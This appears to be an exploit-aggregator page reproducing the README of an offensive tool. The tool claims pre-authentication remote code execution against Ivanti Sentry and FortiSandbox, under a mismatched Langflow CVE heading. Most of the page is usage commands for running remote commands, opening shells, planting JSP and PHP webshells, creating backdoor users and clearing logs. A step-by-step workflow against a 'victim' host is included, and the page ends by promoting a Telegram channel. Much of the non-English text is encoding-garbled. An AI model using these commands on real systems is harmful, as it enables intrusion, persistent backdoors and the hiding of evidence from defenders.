Sploitus

Exploit for CVE-2026-5027-Langflow

kitploit ┬╖ 2026-08-25

Exploit Code

MARKDOWN191 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-LAYER-6-CVE-2026-5027-LANGFLOW
# (CVE-2026-5027) рдФрд░ (CVE-2026-10520) (CVE-2026-25089) рд╢реЛрд╖рдг рдЙрдкрдХрд░рдг:

## рдХреНрд▓реЛрди рдХрд░реЗрдВ

root@kitploit:~
    
    
    git clone https://github.com/Layer-6/CVE-2026-5027-Langflow.git
    cd CVE-2026-5027-Langflow
    

# рдЙрдкрдпреЛрдЧ (exploit.py) рдлрд╝рд╛рдЗрд▓

# рд╕реНрд╡рдЪрд╛рд▓рд┐рдд рдкрд░реАрдХреНрд╖рдг рдФрд░ рд╢реЛрд╖рдгред

root@kitploit:~
    
    
    python3 exploit.py -u https://target.com
    

## CLI рдХрд╕реНрдЯрдо рд╕реЗрдЯрд┐рдВрдЧреНрд╕

## рдЬрдм рд╢реЗрд▓ рдХрд┐рд╕реА рдлрд╝реЛрд▓реНрдбрд░ рдХреЗ рдЕрдВрджрд░ рд╣реЛ рддреЛ рдЕрдкрдирд╛ рд╕реНрд╡рдпрдВ рдХрд╛ рд╡реЗрдмрд╢реЗрд▓ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВ:

root@kitploit:~
    
    
    python3 exploit.py -u https://target.com --shell 
    

(ЁЯУБshells/my-shell.php)

# рдЬрдм рд╢реЗрд▓ рдЯреВрд▓ рдлрд╝реЛрд▓реНрдбрд░ рдореЗрдВ рд╣реЛ рдпрд╛ рдмрд┐рдирд╛ рдлрд╝реЛрд▓реНрдбрд░ рдХреЗ рдЯрд░реНрдорд┐рдирд▓ рдХреЗ рдЕрдВрджрд░ рд╣реЛ:

root@kitploit:~
    
    
    python3 exploit.py -u https://target.com --shell my-shell.php
    

# рдЖрдкрдХрд╛ рд╡реЗрдмрд╢реЗрд▓ (PHP, Python (CGI), Perl, Ruby, ASPX) рд╣реЛ рд╕рдХрддрд╛ рд╣реИред

# рдЖрдк --t рдХреЗ рд╕рд╛рде рдЯрд╛рдЗрдордЖрдЙрдЯ рд╕реЗрдЯ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ --p рдХреЗ рд╕рд╛рде рдлрд╝реЛрд▓реНрдбрд░реЛрдВ рдФрд░ рдлрд╝рд╛рдЗрд▓реЛрдВ рд╕реЗ рдкреЗрд▓реЛрдб рдпрд╛ рдХрд╕реНрдЯрдо рдкрде рд▓реЛрдб/рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ:

root@kitploit:~
    
    
    python3 exploit.py -u https://target.com | -t 58 | |-p payloads.txt | | --upload-paths Dirs.txt |
    

## рдЙрджрд╛рд╣рд░рдг:

root@kitploit:~
    
    
    python3 exploit.py -u https://target.com --shell shells/myshell.php -t 58 -p payloads.txt --upload-paths dirs.txt
    

## рдЙрдкрдпреЛрдЧ (exploitt.py) рдлрд╝рд╛рдЗрд▓

# рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд CVE рдХреЗ рд▓рд┐рдП рдбрд┐рдЬрд╝рд╛рдЗрди рдХрд┐рдпрд╛ рдЧрдпрд╛:

# ┬╖ CVE-2026-10520 (CVSS 10.0)

┬╖ CVE-2026-25089 (CVSS 9.1)

## рдкреНрд░реА-рдСрде рд░рд┐рдореЛрдЯ рдХреЛрдб рдирд┐рд╖реНрдкрд╛рджрди

рдХреЛрдИ рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓ рдЖрд╡рд╢реНрдпрдХ рдирд╣реАрдВред

# ЁЯУЦ рдЙрдкрдпреЛрдЧ

# рддреНрд╡рд░рд┐рдд рдкреНрд░рд╛рд░рдВрдн - рдЗрдВрдЯрд░реИрдХреНрдЯрд┐рд╡ рдореЗрдиреВ (рдХреЛрдИ рддрд░реНрдХ рдирд╣реАрдВ)

root@kitploit:~
    
    
    python3 exploitt.py
    

# рдлрд┐рд░ рдирд┐рд░реНрджреЗрд╢реЛрдВ рдХрд╛ рдкрд╛рд▓рди рдХрд░реЗрдВ:

# 1\. рд▓рдХреНрд╖реНрдп рдкреНрд░рдХрд╛рд░ рдЪреБрдиреЗрдВ (Ivanti рдпрд╛ Forti)

  2. рд▓рдХреНрд╖реНрдп URL рджрд░реНрдЬ рдХрд░реЗрдВ (рдЙрджрд╛. https://192.168.1.100:8443)
  3. рдЯрд╛рдЗрдордЖрдЙрдЯ, рдкреНрд░реЙрдХреНрд╕реА, рдбреАрдмрдЧ рдореЛрдб рд╕реЗрдЯ рдХрд░реЗрдВ
  4. рдХреНрд░рд┐рдпрд╛ рдЪреБрдиреЗрдВ (рдХрдорд╛рдВрдб, рд╢реЗрд▓, рд╡реЗрдмрд╢реЗрд▓, рдЖрджрд┐)



# рдХрдорд╛рдВрдб рд▓рд╛рдЗрди (рдЙрдиреНрдирдд)

# 1\. Ivanti Sentry (CVE-2026-10520)

root@kitploit:~
    
    
    # Check if vulnerable
    python3 exploitt.py -u https://ivanti.example.com:8443 --type ivanti -c "id"
    
    # Interactive shell
    python3 exploitt.py -u https://ivanti.example.com:8443 --type ivanti -s
    
    # Deploy JSP webshell (Tomcat)
    python3 exploitt.py -u https://ivanti.example.com:8443 --type ivanti -w
    
    # Create backdoor user + clean logs
    python3 exploitt.py -u https://ivanti.example.com:8443 --type ivanti -p --clean
    

  2. FortiSandbox (CVE-2026-25089)



root@kitploit:~
    
    
    # Single command
    python3 exploitt.py -u https://forti.example.com --type forti -c "whoami"
    
    # Interactive shell with file upload
    python3 exploitt.py -u https://forti.example.com --type forti -s
    # Inside shell: upload /path/local.txt /remote/path.txt
    
    # Deploy PHP webshell
    python3 exploitt.py -u https://forti.example.com --type forti -w
    
    # Full autoтАСpwn (check, shell, webshell, persist, clean)
    python3 exploitt.py -u https://forti.example.com --type forti -s -w -p --clean
    

  3. рд╕реНрд╡рддрдГ-рдкрд╣рдЪрд╛рди (рд╕реНрдХреНрд░рд┐рдкреНрдЯ рд╕реЗрд╡рд╛ рдХрд╛ рдЕрдиреБрдорд╛рди рд▓рдЧрд╛рддреА рд╣реИ)



root@kitploit:~
    
    
    python3 exploitt.py -u https://target.example.com -c "id"
    

  4. рдкреНрд░реЙрдХреНрд╕реА рдФрд░ рдбреАрдмрдЧ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВ



root@kitploit:~
    
    
    python3 exploitt.py -u https://target:8443 --proxy http://127.0.0.1:8080 --debug -c "uname -a"
    

рдЙрдкрд▓рдмреНрдз рдХрдорд╛рдВрдб-рд▓рд╛рдЗрди рддрд░реНрдХ

рдЗрдВрдЯрд░реИрдХреНрдЯрд┐рд╡ рд╢реЗрд▓ рдХрдорд╛рдВрдб

рдЗрдВрдЯрд░реИрдХреНрдЯрд┐рд╡ рд╢реЗрд▓ рдХреЗ рдЕрдВрджрд░ рдЖрдк рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ:

рдХрдорд╛рдВрдб| рдЙрджрд╛рд╣рд░рдг| рд╡рд┐рд╡рд░рдг  
---|---|---  
normal command| `id`| рдХреЛрдИ рднреА рд╕рд┐рд╕реНрдЯрдо рдХрдорд╛рдВрдб рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░реЗрдВ  
  
рд╡реЗрдмрд╢реЗрд▓ рдкрд░рд┐рдирд┐рдпреЛрдЬрди рд╡рд┐рд╡рд░рдг

┬╖ Ivanti Sentry тАУ Tomcat webapps рдХреЗ рдЕрдВрджрд░ рдПрдХ .jsp рд╢реЗрд▓ рдкрд░рд┐рдирд┐рдпреЛрдЬрд┐рдд рдХрд░рддрд╛ рд╣реИ (/usr/local/tomcat/webapps/ROOT/) ┬╖ рдПрдХреНрд╕реЗрд╕ рдХрд░реЗрдВ: https://target/shell_random.jsp?cmd=whoami ┬╖ FortiSandbox тАУ рд╡реЗрдм рд░реВрдЯ рдХреЗ рдЕрдВрджрд░ рдПрдХ .php рд╢реЗрд▓ рдкрд░рд┐рдирд┐рдпреЛрдЬрд┐рдд рдХрд░рддрд╛ рд╣реИ (/var/www/html/) ┬╖ рдПрдХреНрд╕реЗрд╕ рдХрд░реЗрдВ: https://target/shell_random.php?cmd=whoami

рдЙрджрд╛рд╣рд░рдг рдХрд╛рд░реНрдпрдкреНрд░рд╡рд╛рд╣ (рд╕рдВрдкреВрд░реНрдг рдкреИрда рдкрд░реАрдХреНрд╖рдг)

root@kitploit:~
    
    
    # 1. Detect and exploit
    python3 exploitt.py -u https://victim.com:8443 --type ivanti -s
    
    # 2. Inside the shell, check privileges
    id
    
    # 3. Deploy webshell for persistence
    python3 exploitt.py -u https://victim.com:8443 --type ivanti -w
    
    # 4. Create a backdoor user
    python3 exploitt.py -u https://victim.com:8443 --type ivanti -p
    
    # 5. Clean logs
    python3 exploitt.py -u https://victim.com:8443 --type ivanti --clean
    

# Red рдЯреЗрд▓реАрдЧреНрд░рд╛рдо рдЪреИрдирд▓ рджреНрд╡рд╛рд░рд╛:

https://t.me/Red_Rooted_Ghost